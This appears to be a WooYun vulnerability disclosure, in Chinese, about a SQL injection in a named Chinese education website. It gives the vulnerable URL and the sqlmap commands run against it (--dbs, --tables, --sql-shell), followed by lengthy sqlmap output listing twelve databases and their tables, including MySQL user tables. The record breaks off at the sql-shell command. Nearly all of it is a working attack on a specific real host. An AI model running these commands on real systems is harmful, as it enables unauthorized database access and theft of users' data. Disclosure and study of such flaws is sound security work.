WooYun.org

注入点url: http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146
python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-img/xwpd2.php?xxid=62&id=14146" --dbs --tables --sql-shell什么的：先上图

入口有了，继续往下：
12个数据库拿下来：
available databases [12]:
[*] chat
[*] flash
[*] flashtv
[*] information_schema
[*] jfltopxx
[*] mysql
[*] pt
[*] test
[*] upwebbook
[*] www1pt
[*] www1topxx
[*] wwwpt

接着就是各种表了：表是在太多了，我这里只能截些图了，顺便贴上点信息

-------------------------

太多了没等跑完就ctrl+C了
[22:34:28] [INFO] fetching tables
[22:34:28] [INFO] fetching number of tables for database 'information_schema'
[22:34:28] [INFO] retrieved: 28
[22:34:36] [INFO] retrieved: CHARACTER_SETS
[22:35:14] [INFO] retrieved: COLLATIONS
[22:35:48] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[22:36:59] [INFO] retrieved: COLUMNS
[22:37:15] [INFO] retrieved: COLUMN_PRIVILEGES
[22:37:44] [INFO] retrieved: ENGINES
[22:38:03] [INFO] retrieved: EVENTS
[22:38:11] [INFO] retrieved: FILES
[22:38:25] [INFO] retrieved: GLOBAL_STATUS
[22:38:55] [INFO] retrieved: GLOBAL_VARIABLES
[22:39:13] [INFO] retrieved: KEY_COLUMN_USAGE
[22:39:40] [INFO] retrieved: PARTITIONS
[22:40:06] [INFO] retrieved: PLUGINS
[22:40:15] [INFO] retrieved: PROCESSLIST
[22:40:39] [INFO] retrieved: PROFILING
[22:40:52] [INFO] retrieved: REFERENTIAL_CONSTRAINTS
[22:41:48] [INFO] retrieved: ROUTINES
[22:42:00] [INFO] retrieved: SCHEMATA
[22:42:18] [INFO] retrieved: SCHEMA_PRIVILEGES
[22:42:47] [INFO] retrieved: SESSION_STATUS
[22:43:20] [INFO] retrieved: SESSION_VARIABLES
[22:43:38] [INFO] retrieved: STATISTICS
[22:43:51] [INFO] retrieved: TABLES
[22:44:05] [INFO] retrieved: TABLE_CONSTRAINTS
[22:44:43] [INFO] retrieved: TABLE_PRIVILEGES
[22:45:08] [INFO] retrieved: TRIGGERS
[22:45:21] [INFO] retrieved: USER_PRIVILEGES
[22:45:59] [INFO] retrieved: VIEWS
[22:46:12] [INFO] fetching number of tables for database 'chat'
[22:46:12] [INFO] retrieved: 3
[22:46:13] [INFO] retrieved: chatsession
[22:46:37] [INFO] retrieved: message
[22:46:53] [INFO] retrieved: userlist
[22:47:05] [INFO] fetching number of tables for database 'flash'
[22:47:05] [INFO] retrieved: 2
[22:47:07] [INFO] retrieved: all_table
[22:47:20] [INFO] retrieved: menu
[22:47:25] [INFO] fetching number of tables for database 'flashtv'
[22:47:25] [INFO] retrieved: 4
[22:47:29] [INFO] retrieved: all_table
[22:47:42] [INFO] retrieved: menu
[22:47:54] [INFO] retrieved: pinglun
[22:48:15] [INFO] retrieved: user1
[22:48:28] [INFO] fetching number of tables for database 'jfltopxx'
[22:48:28] [INFO] retrieved: 15
[22:48:30] [INFO] retrieved: 2012zaosheng
[22:48:54] [INFO] retrieved: adip
[22:49:00] [INFO] retrieved: all_table
[22:49:18] [INFO] retrieved: banner
[22:49:27] [INFO] retrieved: djtj
[22:49:32] [INFO] retrieved: gg
[22:49:35] [INFO] retrieved: ip
[22:49:38] [INFO] retrieved: link
[22:49:47] [INFO] retrieved: ly
[22:49:49] [INFO] retrieved: menu
[22:49:55] [INFO] retrieved: pinglun
[22:50:10] [INFO] retrieved: techersms
[22:50:25] [INFO] retrieved: tp
[22:50:27] [INFO] retrieved: user1
[22:50:39] [INFO] retrieved: votes
[22:50:52] [INFO] fetching number of tables for database 'mysql'
[22:50:52] [INFO] retrieved: 25
[22:50:59] [INFO] retrieved: all_table
[22:51:19] [INFO] retrieved: all_tablepart
[22:51:30] [INFO] retrieved: all_tablepinglun
[22:51:49] [INFO] retrieved: columns_priv
[22:52:12] [INFO] retrieved: db
[22:52:15] [INFO] retrieved: event
[22:52:22] [INFO] retrieved: func
[22:52:36] [INFO] retrieved: general_log
[22:52:56] [INFO] retrieved: help_category
[22:53:15] [INFO] retrieved: help_keyword
[22:53:35] [INFO] retrieved: help_relation
[22:53:49] [INFO] retrieved: help_topic
[22:53:57] [INFO] retrieved: host
[22:54:01] [INFO] retrieved: ndb_binlog_index
[22:54:28] [INFO] retrieved: proc
[22:54:37] [INFO] retrieved: procs_priv
[22:54:49] [INFO] retrieved: servers
[22:54:58] [INFO] retrieved: slow_log
[22:55:19] [INFO] retrieved: tables_priv
[22:55:42] [INFO] retrieved: time_zone
[22:55:55] [INFO] retrieved: time_zone_leap_second
[22:56:20] [INFO] retrieved: time_zone_name
[22:56:38] [INFO] retrieved: time_zone_transition
[22:56:57] [INFO] retrieved: time_zone_transition_type
[22:57:09] [INFO] retrieved: user
[22:57:19] [INFO] fetching number of tables for database 'pt'
[22:57:19] [INFO] retrieved: 20
[22:57:25] [INFO] retrieved: adip
[22:57:35] [INFO] retrieved: all_table
[22:57:51] [INFO] retrieved: all_tablepart
[22:57:58] [INFO] retrieved: all_tablepinglun
[22:58:08] [INFO] retrieved: box_table
[22:58:21] [INFO] retrieved: boxpart
[22:58:29] [INFO] retrieved: diymb
[22:58:36] [INFO] retrieved: grjlm
[22:58:44] [INFO] retrieved: grly
[22:58:48] [INFO] retrieved: grphoto
[22:59:02] [INFO] retrieved: gryuru
[22:59:13] [INFO] retrieved: haoyou
[22:59:24] [INFO] retrieved: haoyouly
[22:59:28] [INFO] retrieved: links
[22:59:39] [INFO] retrieved: logolink
[22:59:48] [INFO] retrieved: perphotopart
[23:00:14] [INFO] retrieved: photopinglun
[23:00:45] [INFO] retrieved: pingyu
[23:00:54] [INFO] retrieved: sonuser
[23:01:03] [INFO] retrieved: user
[23:01:09] [INFO] fetching number of tables for database 'test'
[23:01:09] [INFO] retrieved: 0
[23:01:11] [WARNING] unable to retrieve the number of tables for database 'test'
[23:01:11] [INFO] fetching number of tables for database 'upwebbook'
[23:01:11] [INFO] retrieved: 14
[23:01:12] [INFO] retrieved: booknone
[23:01:52] [INFO] retrieved: bookpinglun
[23:02:39] [INFO] retrieved: bookrelation
[23:02:56] [INFO] retrieved: books
[23:03:00] [INFO] retrieved: bookus
再来看看有没有sql-shell:果然有
D:\python2.7.6>python ./sqlmap/sqlmap.py -u "http://jfl.czedu.com.cn/index301-im
g/xwpd2.php?xxid=62&id=14146" --sql-shell